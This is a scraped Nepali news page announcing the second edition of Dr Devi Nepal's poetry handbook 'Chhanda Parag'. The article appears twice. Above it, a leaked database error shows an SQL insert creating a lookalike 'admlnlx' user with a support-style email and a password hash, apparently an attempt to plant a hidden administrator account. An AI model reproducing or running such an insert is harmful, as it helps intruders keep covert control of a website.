WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlU3TZH36rCDuKkey8GZKB08KJECCu.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 20:46:50', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
‘छन्द पराग’ को दोस्रो संस्करण – Gaule Khabar

‘छन्द पराग’ को दोस्रो संस्करण

‘छन्द पराग’ को दोस्रो संस्करण

काठमाडौँ, मंसिर २९ –

छन्द कविता लेखनको सीप र संरचनात्मक विवेचनामा आधारित डा देवी नेपालको ‘छन्द पराग’ को दोस्रो संस्करण आज यहाँ सार्वजनिक गरिएको छ ।

घोष्ट राइटिङ नेपालको सिर्जनात्मक लेखन प्रशिक्षण कक्षामा कवि नेपालले सहभागीलाई प्रदान गरी सार्वजनिक गराउनु भएको हो ।

ऐरावती प्रकाशनले बजारमा ल्याएको सो ३६८ पृष्ठको पुस्तकले छन्द लेखनमा रुची राख्ने नयाँ पुस्तालाई मार्गदर्शन गर्न सक्नेछ । कृतिमा कविताका सम्पूर्ण रुपको संरचनादेखि बृहत्तर महाकाव्यसम्म र प्रत्येक कविताको लय विधानबारे चर्चा गरिएको छ ।

छन्द प्रशिक्षण अभियान र नेपाली विषयको अध्यापन र लेखनमा सक्रिय कवि नेपालले सो क्रममा पुस्तकले करिब ५०० कविका कविताशं उदाहरणका रुपमा प्रस्तुत गरेको बताउनुभयो । रासस
काठमाडौँ, २९ मङ्सिर । छन्द कविता लेखनको सीप र संरचनात्मक विवेचनामा आधारित डा देवी नेपालको ‘छन्द पराग’ को दोस्रो संस्करण आज यहाँ सार्वजनिक गरिएको छ ।

घोष्ट राइटिङ नेपालको सिर्जनात्मक लेखन प्रशिक्षण कक्षामा कवि नेपालले सहभागीलाई प्रदान गरी सार्वजनिक गराउनु भएको हो ।

ऐरावती प्रकाशनले बजारमा ल्याएको सो ३६८ पृष्ठको पुस्तकले छन्द लेखनमा रुची राख्ने नयाँ पुस्तालाई मार्गदर्शन गर्न सक्नेछ । कृतिमा कविताका सम्पूर्ण रुपको संरचनादेखि बृहत्तर महाकाव्यसम्म र प्रत्येक कविताको लय विधानबारे चर्चा गरिएको छ ।

छन्द प्रशिक्षण अभियान र नेपाली विषयको अध्यापन र लेखनमा सक्रिय कवि नेपालले सो क्रममा पुस्तकले करिब ५०० कविका कविताशं उदाहरणका रुपमा प्रस्तुत गरेको बताउनुभयो । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका